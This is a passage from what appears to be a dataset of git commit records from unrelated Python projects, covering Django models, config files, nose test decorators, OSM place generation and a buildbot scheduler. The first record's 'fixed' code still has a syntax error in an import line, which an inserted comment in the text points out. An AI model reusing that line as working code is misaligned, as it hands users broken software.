pgsql_dropuser()
<commit_msg>Fix 'cant import from .postgresql'<commit_after>###################################################################
#
# Copyright (c) 2013 Miing.org <samuel.miing@gmail.com>
#
# This software is licensed under the GNU Affero General Public
# License version 3 (AGPLv3), as published by the Free Software
# Foundation, and may be copied, distributed, and modified under
# those terms.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# file LICENSE for more details.
#
###################################################################
from .postgresql import (
pgsql_createuser,
pgsql_dropdb,
pgsql_createdb,
pgsql_dropuser,
)
from .django import syncdb grantuser
def setup_pgsql_database():
"""Setup PostgreSQL database"""
pgsql_createuser()
pgsql_createdb()
syncdb()
grantuser()
def drop_pgsql_database():
"""Clean PostgreSQL database"""
pgsql_dropdb()
pgsql_dropuser()
|
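Note that the "fixed" side of the dbengine record still contains `from .django import syncdb grantuser`, which is a SyntaxError (a comma is missing); the commit only repaired the wildcard-style .postgresql import. A fully valid import block would look like the sketch below (illustrative; module layout assumed from the record):
# Hypothetical corrected imports for fabfile/dbengine.py
from .postgresql import (
    pgsql_createuser,
    pgsql_createdb,
    pgsql_dropdb,
    pgsql_dropuser,
)
from .django import syncdb, grantuser  # comma added; the record omits it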
2201aaeffb93713adcdf20f5868b5a90b562efda
|
pages/models.py
|
pages/models.py
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
Increase character limit for pages
|
Increase character limit for pages
Closes #70.
|
Python
|
isc
|
ashbc/tgrsite,ashbc/tgrsite,ashbc/tgrsite
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
Increase character limit for pages
Closes #70.
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
<commit_before>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
<commit_msg>Increase character limit for pages
Closes #70.<commit_after>
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
Increase character limit for pages
Closes #70.
from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
<commit_before>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=8192, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=1024, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=1024, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=1024, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=1024, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
<commit_msg>Increase character limit for pages
Closes #70.<commit_after>from django.db import models
class Page(models.Model):
def __str__(self):
return self.name
name = models.CharField(max_length=64, blank=False)
name.help_text='Internal name of page'
title = models.CharField(max_length=64, blank=True)
title.help_text='Page title to display in titlebar of browser/tab'
body = models.TextField(max_length=16384, blank=True)
body.help_text='Page contents'
head = models.TextField(max_length=16384, blank=True)
head.help_text='Custom HTML to go in the <head> of the page'
css = models.TextField(max_length=16384, blank=True)
css.help_text='Custom CSS styles for the page'
leftbar = models.TextField(max_length=16384, blank=True)
leftbar.help_text='Left sidebar contents (use panels)'
rightbar = models.TextField(max_length=16384, blank=True)
rightbar.help_text='Right sidebar contents (use panels)'
|
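A caveat on the pages/models change above: in Django, max_length on a TextField is not enforced at the database level, only through form validation and the widget's maxlength attribute, so the raised 16384 limit takes effect at the form layer. A sketch of that (illustrative; requires a configured Django project containing the app from the record):
from django.forms import ModelForm
from pages.models import Page  # assumes the record's app is installed

class PageForm(ModelForm):
    class Meta:
        model = Page
        fields = ["name", "body"]

form = PageForm(data={"name": "about", "body": "x" * 20000})
print(form.is_valid())          # False: 20000 exceeds max_length=16384
print(form.errors.get("body"))  # max-length validation message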
42918ef774625643220c182ca0eb5601841db595
|
dvox/app.py
|
dvox/app.py
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
Add controls for storage size
|
Add controls for storage size
|
Python
|
mit
|
numberoverzero/dvox
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
Add controls for storage size
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
<commit_before>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
<commit_msg>Add controls for storage size<commit_after>
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
Add controls for storage size
config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
<commit_before>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15
}
<commit_msg>Add controls for storage size<commit_after>config = {
"CREATE_RETRIES": 5,
"CHUNK_LOCK_TIMEOUT_SECONDS": 10,
"WORKER_TIMEOUT_SECONDS": 15,
"CHUNK_SIZE": 25,
"BLOCK_BYTE_SIZE": 8
}
|
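The dvox record does not say how the two new keys relate; one plausible reading (an assumption, not stated in the source) is a cubic chunk of CHUNK_SIZE**3 blocks serialized at BLOCK_BYTE_SIZE bytes each, which gives the storage cost per chunk:
config = {
    "CHUNK_SIZE": 25,
    "BLOCK_BYTE_SIZE": 8,
}

# Assumed interpretation only: a CHUNK_SIZE-cubed chunk of fixed-size blocks.
blocks_per_chunk = config["CHUNK_SIZE"] ** 3
chunk_bytes = blocks_per_chunk * config["BLOCK_BYTE_SIZE"]
print(blocks_per_chunk)  # 15625 blocks
print(chunk_bytes)       # 125000 bytes per chunk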
510063159145cd3fdc7bdd0c8b93dc46d98a88c8
|
obj_sys/models.py
|
obj_sys/models.py
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
Remove not used app config.
|
Remove not used app config.
|
Python
|
bsd-3-clause
|
weijia/obj_sys,weijia/obj_sys
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
Remove not used app config.
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
<commit_before># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
<commit_msg>Remove not used app config.<commit_after>
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
Remove not used app config.
# Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
<commit_before># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
# apps.py
from django.apps import AppConfig
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
except ImportError:
pass
<commit_msg>Remove not used app config.<commit_after># Create your models here.
from models_obj_rel import *
from models_ufs_obj import *
try:
import tagging
tagging.register(UfsObj)
except ImportError:
pass
|
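The obj_sys cleanup above keeps the optional-dependency idiom: try the import, register on success, silently skip otherwise. The same pattern, generalized into a helper (illustrative; register_tagging is not in the record):
def register_tagging(model):
    """Register model with django-tagging when the package is available."""
    try:
        import tagging
    except ImportError:
        return False  # tagging not installed; feature is skipped
    tagging.register(model)
    return True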
33a9bd5cf465a56c2eb156dcbc0d4e61a0f590a4
|
osmABTS/places.py
|
osmABTS/places.py
|
"""
Places of interest generation
=============================
"""
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
Implement place class and homes generation
|
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.
|
Python
|
mit
|
tschijnmo/osmABTS
|
"""
Places of interest generation
=============================
"""
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level upper as the dictionary
key, here just a few attributes are needed
.. py:attribute:: node
The node identity for the place of interest in the network
.. py::attribute:: name
The name of the place of interest
.. py::attribute:: weight
The weight for it during the place allocation. The probability of being
selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existance of residential road, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constance for place generation
# -----------------------------------
#
|
<commit_before>"""
Places of interest generation
=============================
"""
<commit_msg>Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.<commit_after>
|
"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest will basically just carry the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. And additionally, a name can be given for it,
as well as a weight that can be used for the random allocation for the
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level up, as the dictionary
key, only a few attributes are needed here
.. py:attribute:: node
The node identity for the place of interest in the network
.. py:attribute:: name
The name of the place of interest
.. py:attribute:: weight
The weight for the place during allocation, i.e. the relative probability
of being selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existence of residential roads, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constants for place generation
# -----------------------------------
#
|
"""
Places of interest generation
=============================
"""
Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest."""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest basically just carries the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. Additionally, a name can be given for it,
as well as a weight that can be used for the random allocation of
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level up, as the dictionary
key, only a few attributes are needed here
.. py:attribute:: node
The node identity for the place of interest in the network
.. py:attribute:: name
The name of the place of interest
.. py:attribute:: weight
The weight for the place during allocation, i.e. the relative probability
of being selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existence of residential roads, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constants for place generation
# -----------------------------------
#
|
<commit_before>"""
Places of interest generation
=============================
"""
<commit_msg>Implement place class and homes generation
The Place class for places of interest has been implemented, as well as
the generation of homes, which is different from the generation of other
places of interest.<commit_after>"""
Places of interest generation
=============================
This module defines a class for places of interest and the functions for
generating the data structure for all of them from the OSM raw data.
Each place of interest basically just carries the information about its
location in the **network** as the identity of the network node which is
nearest to its actual location. Additionally, a name can be given for it,
as well as a weight that can be used for the random allocation of
travellers.
The places of interest will be bundled in a dictionary, with the name of the
category as the key and a list of the actual places as the value.
"""
class Place(object):
"""The places of interest for the travellers
Since the category is going to be stored one level up, as the dictionary
key, only a few attributes are needed here
.. py:attribute:: node
The node identity for the place of interest in the network
.. py:attribute:: name
The name of the place of interest
.. py:attribute:: weight
The weight for the place during allocation, i.e. the relative probability
of being selected.
"""
__slots__ = [
'node',
'name',
'weight',
]
def __init__(self, node, name, weight):
"""Initializes the place instance"""
self.node = node
self.name = name
self.weight = weight
#
# Home generation
# ---------------
#
# The home generation is different from all the other places, since it is going
# to be based on the existence of residential roads, rather than specific
# locations on the map.
#
# The generation code will iterate over all the nodes of the graph, find out
# the total length of residential road edges on it, and use that length as the
# weight. For nodes with no residential road, no people will live there.
#
def _gen_homes(net):
"""Generates a list of homes for a given network
:param net: The NetworkX graph for the simulation
:returns: A list of :py:class:`Place` instances for the homes
"""
homes = []
for node in net.nodes_iter():
weight = 0.0
for road in net[node].itervalues():
if road['highway'] == 'residential':
weight += road['length']
# 0.01 is an arbitrary delta to skip nodes with few residents
if weight > 0.01:
homes.append(
Place(node, 'home', weight)
)
return homes
#
# Some constants for place generation
# -----------------------------------
#
|
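The Place weights above are meant to drive a random allocation of travellers. A minimal sketch of such a weighted draw, assuming a hypothetical helper allocate_place that is not part of the committed module:
import random
def allocate_place(places):
    """Pick one Place, with probability proportional to its weight."""
    total = sum(place.weight for place in places)
    point = random.uniform(0, total)
    # Walk the cumulative weights until the random point is covered.
    for place in places:
        point -= place.weight
        if point <= 0:
            return place
    return places[-1]  # guard against floating-point drift
# e.g. home = allocate_place(_gen_homes(net))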
306cf5987c90d54d72037c19dd02f07be37cbb6f
|
make_mozilla/base/tests/decorators.py
|
make_mozilla/base/tests/decorators.py
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
Add integration test decorator to prevent certain tests running unless we really want them to.
|
Add integration test decorator to prevent certain tests running unless we really want them to.
|
Python
|
bsd-3-clause
|
mozilla/make.mozilla.org,mozilla/make.mozilla.org,mozilla/make.mozilla.org,mozilla/make.mozilla.org
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
Add integration test decorator to prevent certain tests running unless we really want them to.
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
<commit_before>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
<commit_msg>Add integration test decorator to prevent certain tests running unless we really want them to.<commit_after>
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
Add integration test decorator to prevent certain tests running unless we really want them to.from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
<commit_before>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
<commit_msg>Add integration test decorator to prevent certain tests running unless we really want them to.<commit_after>from functools import wraps
from nose.plugins.attrib import attr
from nose.plugins.skip import SkipTest
import os
__all__ = ['wip']
def fail(message):
raise AssertionError(message)
def wip(f):
@wraps(f)
def run_test(*args, **kwargs):
try:
f(*args, **kwargs)
except Exception as e:
raise SkipTest("WIP test failed: " + str(e))
fail("test passed but marked as work in progress")
return attr('wip')(run_test)
def integration(f):
@wraps(f)
def run_test(*args, **kwargs):
integration_run = (os.getenv('INTEGRATION', None) is not None)
if integration_run:
f(*args, **kwargs)
else:
raise SkipTest("Skipping integration test")
return attr('integration')(run_test)
|
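A hypothetical usage sketch for the new decorator (the test name is illustrative): the wrapped test only runs when the INTEGRATION environment variable is set, e.g. INTEGRATION=1 nosetests -a integration.
from make_mozilla.base.tests.decorators import integration
@integration
def test_talks_to_the_real_backend():
    # Skipped with "Skipping integration test" unless INTEGRATION is set
    # in the environment; also selectable via the nose attrib plugin.
    assert True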
aeae640c34b7f68870304fb2a6a163d852440b7a
|
test/buildbot/buildbot_config/master/schedulers.py
|
test/buildbot/buildbot_config/master/schedulers.py
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
def get_schedulers():
return []
|
"""
This module contains the logic which returns the set of
schedulers to use for the build master.
"""
from buildbot.changes.filter import ChangeFilter
from buildbot.schedulers.basic import SingleBranchScheduler
def get_schedulers():
full = SingleBranchScheduler(name="full",
change_filter=ChangeFilter(branch="master"),
treeStableTimer=60,
builderNames=["vagrant-master"])
return [full]
|
Add a scheduler for the master branch to run
|
Buildbot: Add a scheduler for the master branch to run
|
Python
|
mit
|
